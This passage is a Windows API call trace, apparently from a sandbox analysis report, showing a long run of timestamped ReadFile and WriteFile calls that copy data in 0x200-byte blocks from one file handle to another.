lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.422] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.423] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.423] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.424] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.424] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.425] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.425] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.426] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.426] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.427] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.427] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.428] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.428] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.429] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.429] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.429] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.430] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.430] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.431] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.432] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.432] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.433] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.434] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.434] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.435] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.435] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.436] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.436] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.437] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.437] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.438] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.438] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.438] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.439] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.439] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.440] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.440] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.441] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.441] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.442] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.442] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.443] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.443] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.443] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.444] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.444] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.445] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.445] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.446] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.446] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.447] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.447] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.448] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.448] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.448] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.449] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.449] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.450] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.450] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.451] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.451] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.452] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.452] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.453] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.453] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.453] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.454] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.454] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.455] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.455] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.456] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.456] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.457] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.457] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.458] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.458] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.458] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.459] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.459] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.460] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.460] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.461] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.461] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.462] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.462] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.463] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.463] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.463] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.464] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.465] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.465] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.466] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.466] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.467] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.467] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.468] 